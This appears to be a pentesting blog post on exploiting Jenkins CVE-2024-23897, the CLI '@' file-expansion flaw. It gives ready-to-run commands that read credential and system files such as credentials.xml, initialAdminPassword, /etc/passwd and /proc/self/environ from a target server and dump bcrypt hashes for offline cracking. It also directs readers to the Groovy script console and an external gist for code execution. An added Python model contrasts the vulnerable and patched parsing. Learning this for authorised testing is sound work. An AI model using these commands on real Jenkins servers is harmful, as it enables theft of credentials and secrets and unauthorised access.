Notes From the Field: Hacking Jenkins CVE-2024-23897
Jenkins is a highly sought-after target because of the wide-reaching implications of its attack surface, especially when the installation hasn't been updated. It is also a favorite of the PEN-200 (OSCP) course. It is important to know the exploitation vectors of Jenkins, such as default passwords that may still be in use, and how to exploit it using Groovy scripts for initial access.
This post will dive into how to read arbitrary files from a Jenkins server running on Linux and recover bcrypt password hashes for offline cracking.
So what is CVE-2024-23897 and how can I leverage it for exploitation?
The interesting part is the way the built-in command-line interface processes CLI command arguments: an argument that starts with "@" followed by a file path is expanded into the contents of that file on the server. The use of "@" is extremely important.
On a Jenkins installation you can pull the command-line interface Java utility from the target server using the following command:
wget <ip>:<port>/jnlpJars/jenkins-cli.jar
Once you have the CLI client downloaded, this syntax is what we will be using a lot:
java -jar jenkins-cli.jar -s <jenkins_url> <command>
Some useful commands for directory searches and hunting for secrets:
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/secrets/initialAdminPassword
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/etc/passwd
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/proc/self/environ
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/users.xml
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/users/<user_folder>/config.xml
java -jar jenkins-cli.jar -s <weburl>:<port> connect-node @/var/jenkins_home/credentials.xml
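Why these commands leak file contents, as an added example that is not code from the original post or from Jenkins: a model of the args4j-style "@file" argument expansion the CLI parser performed, placed beside the patched behaviour in which "@" is an ordinary character. The `allow_at_syntax` flag models the Java system property `hudson.cli.CLICommand.allowAtSyntax`, which the fixed Jenkins releases default to off; `connect_node` is a toy stand-in for a command that echoes its first argument in an error message, and the sample file contents are constructed.

```python
import os
import tempfile

# Constructed sample standing in for a secret file on the Jenkins host.
SAMPLE_LINES = ["line-one-of-secret", "line-two-of-secret"]


def write_sample_file():
    """Write the constructed sample to a temp file and return its path."""
    fd, path = tempfile.mkstemp(prefix="jenkins-at-demo-")
    with os.fdopen(fd, "w") as f:
        f.write("\n".join(SAMPLE_LINES) + "\n")
    return path


def expand_at_args(argv, allow_at_syntax):
    """Model of the pre-fix CLI parser: an argument '@path' is replaced by
    one argument per line of 'path', read on the server side.
    With allow_at_syntax=False (the patched default) '@' is left as-is."""
    expanded = []
    for arg in argv:
        if allow_at_syntax and arg.startswith("@") and len(arg) > 1:
            with open(arg[1:]) as f:
                expanded.extend(line.rstrip("\n") for line in f)
        else:
            expanded.append(arg)
    return expanded


def connect_node(args):
    """Toy stand-in for a command whose error message echoes its first
    argument; this echo is the channel through which file content leaks."""
    node = args[0] if args else ""
    return f"No such node '{node}'"


def run_cli(argv, allow_at_syntax):
    """Parse the arguments as the CLI would, then run the command."""
    return connect_node(expand_at_args(argv, allow_at_syntax))


if __name__ == "__main__":
    path = write_sample_file()
    print("vulnerable:", run_cli(["@" + path], allow_at_syntax=True))
    print("patched:   ", run_cli(["@" + path], allow_at_syntax=False))
```

With expansion enabled the error message carries the first line of the file; with it disabled the server only ever sees the literal string "@/path", which is the mitigation the fixed releases apply.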
Examples of useful commands in action:
[Screenshot: finding Jenkins users]
[Screenshot: dumping bcrypt hashes from a user folder]
Once you are inside a Jenkins box you can execute Groovy scripts by going directly to the script console. To get there directly, use this URL:
<web_url>:<port>/script
This will take you to the Groovy script console:
[Screenshot: Groovy script console]
So Medium is being slightly weird and will not let me post Groovy scripts in this post, so I made a public gist instead. It can be found here:
https://gist.github.com/rootsecdev/273f22a747753e2b17a2fd19c248c4b7